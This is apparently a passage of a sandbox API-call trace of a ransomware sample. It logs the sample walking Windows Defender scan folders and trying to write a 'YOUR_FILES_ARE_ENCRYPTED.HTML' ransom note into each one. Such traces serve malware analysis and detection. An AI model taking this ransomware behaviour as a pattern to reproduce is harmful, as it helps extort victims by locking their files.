lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf216a4f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="..", cAlternateFileName="")) returned 1 [0110.250] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf215715, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf215715, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf21a4b7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.250] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf215715, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf215715, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf21a4b7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.251] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.251] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0110.251] GetProcessHeap () returned 0x600000 [0110.251] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\cleanfiletelemetry\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.251] GetProcessHeap () returned 0x600000 [0110.251] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.251] GetProcessHeap () returned 0x600000 [0110.251] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.252] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="CleanStore", cAlternateFileName="CLEANS~1")) returned 1 [0110.252] StrStrIW (lpFirst="CleanStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.252] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore") returned 66 [0110.252] GetProcessHeap () returned 0x600000 [0110.252] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.253] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore" [0110.253] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\*" [0110.253] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf248abd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.253] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf248abd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="..", cAlternateFileName="")) returned 1 [0110.253] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="Entries", cAlternateFileName="")) returned 1 [0110.253] StrStrIW (lpFirst="Entries", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.253] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries") returned 74 [0110.253] GetProcessHeap () returned 0x600000 [0110.254] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.254] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries" [0110.254] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries\\*" [0110.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf227b52, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62efee, dwReserved1=0x62ef68, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.254] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf227b52, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62efee, dwReserved1=0x62ef68, cFileName="..", cAlternateFileName="")) returned 1 [0110.254] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf226a0d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf226a0d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf22b61b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62efee, dwReserved1=0x62ef68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.254] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf226a0d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf226a0d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf22b61b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62efee, dwReserved1=0x62ef68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.254] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.255] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0110.255] GetProcessHeap () returned 0x600000 [0110.255] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Entries\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\cleanstore\\entries\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.255] GetProcessHeap () returned 0x600000 [0110.255] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.255] GetProcessHeap () returned 0x600000 [0110.255] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.256] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="ResourceData", cAlternateFileName="RESOUR~1")) returned 1 [0110.256] StrStrIW (lpFirst="ResourceData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.256] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData") returned 79 [0110.256] GetProcessHeap () returned 0x600000 [0110.256] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.256] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData" [0110.256] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData\\*" [0110.256] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf232b17, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62efee, dwReserved1=0x62ef68, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0110.257] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf232b17, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62efee, dwReserved1=0x62ef68, cFileName="..", cAlternateFileName="")) returned 1 [0110.257] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf232b17, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf232b17, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2365cf, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62efee, dwReserved1=0x62ef68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.257] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf232b17, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf232b17, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2365cf, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62efee, dwReserved1=0x62ef68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.257] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0110.257] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0110.257] GetProcessHeap () returned 0x600000 [0110.257] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\ResourceData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\cleanstore\\resourcedata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.257] GetProcessHeap () returned 0x600000 [0110.257] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.257] GetProcessHeap () returned 0x600000 [0110.257] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.258] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="Resources", cAlternateFileName="RESOUR~2")) returned 1 [0110.258] StrStrIW (lpFirst="Resources", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.258] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources") returned 76 [0110.258] GetProcessHeap () returned 0x600000 [0110.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.259] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources" [0110.259] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\*" [0110.259] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf23db92, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62efee, dwReserved1=0x62ef68, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.259] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf23db92, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62efee, dwReserved1=0x62ef68, cFileName="..", cAlternateFileName="")) returned 1 [0110.259] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf23db92, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf23db92, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf24172e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62efee, dwReserved1=0x62ef68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.259] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf23db92, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf23db92, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf24172e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62efee, dwReserved1=0x62ef68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.259] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.260] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0110.260] GetProcessHeap () returned 0x600000 [0110.260] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\Resources\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\cleanstore\\resources\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.260] GetProcessHeap () returned 0x600000 [0110.260] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.260] GetProcessHeap () returned 0x600000 [0110.260] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.261] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2463e3, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2463e3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf24c738, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.261] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2463e3, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2463e3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf24c738, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.261] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.261] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 96 [0110.261] GetProcessHeap () returned 0x600000 [0110.261] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\cleanstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.261] GetProcessHeap () returned 0x600000 [0110.261] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.261] GetProcessHeap () returned 0x600000 [0110.261] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.262] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="History", cAlternateFileName="")) returned 1 [0110.262] StrStrIW (lpFirst="History", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.262] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History") returned 63 [0110.262] GetProcessHeap () returned 0x600000 [0110.262] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.263] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History" [0110.263] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*" [0110.263] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf46910b, ftLastWriteTime.dwHighDateTime=0x1d7347a, 